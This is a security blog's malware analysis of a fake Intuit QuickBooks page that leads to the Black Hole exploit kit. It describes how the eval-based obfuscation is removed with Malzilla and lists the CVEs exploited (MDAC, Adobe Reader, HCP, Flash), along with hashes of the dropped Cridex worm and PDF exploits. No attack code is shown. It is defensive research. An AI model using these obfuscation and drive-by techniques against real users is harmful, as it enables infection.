• Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg
  • Delicious

Anti-Malware Laboratory

Yet Another Malware Blog

About

An informal blog from your friendly neighborhood software security humans.

Blog Archive

  • ►  2015 (5)
    • ►  October (1)
    • ►  August (2)
    • ►  May (1)
    • ►  March (1)
  • ►  2014 (8)
    • ►  October (1)
    • ►  July (1)
    • ►  June (1)
    • ►  May (4)
    • ►  April (1)
  • ►  2013 (12)
    • ►  December (3)
    • ►  November (5)
    • ►  August (2)
    • ►  March (2)
  • ▼  2012 (35)
    • ►  April (4)
    • ▼  March (12)
      • NSA Mobility Program
      • The 2012 Cyber Defence University Challenge
      • Double Winrar self-executable archive packed Fakeav
      • Fake Skype Vouchers website leads to Java Exploits
      • AV-TEST Report on Android Anti-Malware Solutions
      • Justin Bieber Facebook Spam
      • Fake Intuit Quickbooks Page Leads to Black Hole Ex...
      • AXMLPrinter2
      • Black Hole exploit kit
      • CrimePack exploit kit
      • Installing Ubuntu 10.04.1 LTS 64 bit, MongoDB 2.0....
      • Baksmali
    • ►  February (17)
    • ►  January (2)

Categories

adobe (1) android (10) android february (1) baksmali (1) Black Hole (2) crimepack (1) disassembler (1) exploit (3) Exploits (4) Fakeav Winrar sfx (1) Fishbowl (1) flash (1) gift certificates (1) Google Authenticator (1) google play (1) hcp (1) java (1) Malware (5) mdac (1) Mobile (24) NSA Mobility Program (1) obfuscated script (1) pdf (1) Reversing (2) rhino (1) skype (1) smali (1) spam (1) test (1) Unpacking (1) vouchers (1) vulnerability (3)

Popular Posts

  • Bank of America spam: An Analysis
    An email claiming to be from Bank of America lures users to open an attachment that shows how to open secure emails from the bank. The mess...
  • [BE CAUTIOUS] Dragon Ball Z: Resurrection of F MALWARE and SCAM
    Be wary of downloading movies in torrent sites.  Executables can also be executed with a file size as huge as a gigabyte...
  • Unpacking MFC Compiled CryptoWall Malware
    Unpacking MFC Compiled CryptoWall Malware Introduction First and foremost, this article does not intend to analyze what CryptoWall malw...

Visitors to this blog

Tuesday, March 6, 2012

Fake Intuit Quickbooks Page Leads to Black Hole Exploit

Posted on Tuesday, March 06, 2012 by Red Horse | No comments
Originally posted by kazmot.

The Blackhole Exploit kit is still a very popular attack on the web. Malwares use this exploit kit to propagate and infect unsuspecting users. Here is a detailed analysis of a fake Intuit page that leads to the exploit kit and the obfuscation technique used by the attack. In this specific targeted attack, we were able to download a Cridex worm, 2 PDF files, and an obfuscated Javascript.

Let's see first what the fake page looks like:

[caption id="attachment_380" align="aligncenter" width="300" caption="Figure 1: Fake Intuit Page"][/caption]

In the above screenshot, we can immediately notice that it is really fake. You may view the legitimate site of Intuit Quickbooks here. The title on the web browser shows "Intuit" but you will see on the status bar that a hidden connection goes to a different remote site.

Now, Let's see what is in this HTML file...

[caption id="attachment_386" align="aligncenter" width="300" caption="Figure 2: Content of the Fage Page"][/caption]

I used Malzilla to connect to the site and get its content. You can see that, other than the usual title and header shown earlier, it also contains an obfuscated script.

Now to decode this script...

You will notice that I highlighted some variables in Figure 2. These variables will become a window.eval() function when the script is executed. window.eval() is a javascript function that executes an argument. This function was used to execute the "deobfuscated" code. Malicious scripts commonly use this technique to avoid script debuggers/emulators that hook this function to create a dump of the deobfuscated code.

So now, we need to modify the script so that Malzilla will be able to get the argument of the eval() function...

[caption id="attachment_388" align="aligncenter" width="300" caption="Figure 3: Removing IF conditions"][/caption]

Figure 3 shows that in this specific sample, we need to remove some IF statements to make sure that the script is executed.

[caption id="attachment_389" align="aligncenter" width="300" caption="Figure 4: Run script and Show Eval() results"][/caption]

If you take a look again at the highlighted variables in Figure 2, you will see that the variable "e" will become the window.eval() function. Figure 4 shows the modifications that we applied. Run the script and then hit the "Show eval() results" button. At the bottom box of Figure 4, you will see the deobfuscated code. It is a hidden iframe that connects to a remote site.

Let's follow this site, shall we...

Again using Malzilla, you need to repeat the steps in order to analyze this remote site. On the Download tab, paste the URL and then hit the "Get" button.

[caption id="attachment_394" align="aligncenter" width="300" caption="Figure 5: Contents of the remote site."][/caption]

Figure 5 shows that this site contains two script tags, so we need to use "Send all scripts to Decoder". Again, like the first site, you can see here that it uses the same technique where window.eval has been assigned to a variable "e". Apply the same modification that we did earlier, run the script, and then get the eval result. Figure 5 also shows which part of the script you need to change.

[caption id="attachment_397" align="aligncenter" width="300" caption="Figure 6: Black Hole exploit code."][/caption]

Figure 6 shows the result. You will now see here the "Please wait page is loading...". This display page is very common on Black Hole exploit codes. Initially, the code is in a single line which makes reading it a little bit hard. You can use a "javascript formatter" to insert newlines and tabs in the script. An example is jsbeautifier.org.

Let's now take a look at the exploit code...

It searches for vulnerable applications installed in the target system. In this sample, it checks for the following:

  • Adobe Reader

  • Flash Player

[caption id="attachment_413" align="aligncenter" width="300" caption="Figure 7: Check installed applications."][/caption]

It deploys an MDAC exploit (CVE-2006-0003 - IE6 COM CreateObject Code Execution) to download and execute a malicious file.

  • File: Cridex worm

  • MD5 hash: c3124a2981d8e1b9e13e8c21c96448f7

  • Virustotal Scan Results


[caption id="attachment_418" align="aligncenter" width="300" caption="Figure 8: Deploying MDAC exploit."][/caption]


It deploys the following PDF exploits:

    • CVE-2008-2992 - Adobe Reader util.printf


      • File: Pdfjsc exploit

      • MD5 hash: 8ad89d5477fe5b074b1767a826207c8a

      • Virustotal Scan Results



    • CVE-2009-0927 - Adobe Reader Collab GetIcon


      • File: Pdfjsc exploit

      • MD5 hash: 84fbc15c2d3e460183b853c566bf3ccf

      • Virustotal Scan Results



[caption id="attachment_419" align="aligncenter" width="300" caption="Figure 9: Deploying PDF exploits."][/caption]

It deploys HCP exploit (CVE-2010-1885):

[caption id="attachment_417" align="aligncenter" width="300" caption="Figure 10: Deploying HCP exploit."][/caption]

The file in the link is an obfuscated script. When the deobfuscated code is saved in a file:


  • File: Javascript iframe

  • MD5 hash: 1f082ef7e2bc87efa2926a81925e6c46

  • Virustotal Scan Results


[caption id="attachment_426" align="aligncenter" width="300" caption="Figure 11: Deobfuscated HCP exploit script"][/caption]

Finaly, it deploys a flash player exploit (CVE-2011-0611 - Adobe Flash Player Memory Corruption):

[caption id="attachment_414" align="aligncenter" width="300" caption="Figure 12: Deploying Flash exploit."][/caption]

More Information:
Black Hole exploit kit

Sample source:
malwaredomainlist.com

References:
Imperva
ZScaler ThreatLab
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Categories: adobe, Black Hole, exploit, Exploits, flash, hcp, mdac, obfuscated script, pdf
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
volute-glacial
volute-glacial
volute-glacial
volute-glacial
Copyright © Anti-Malware Laboratory | Powered by Blogger
Design by Fabthemes | Blogger Template by NewBloggerThemes.com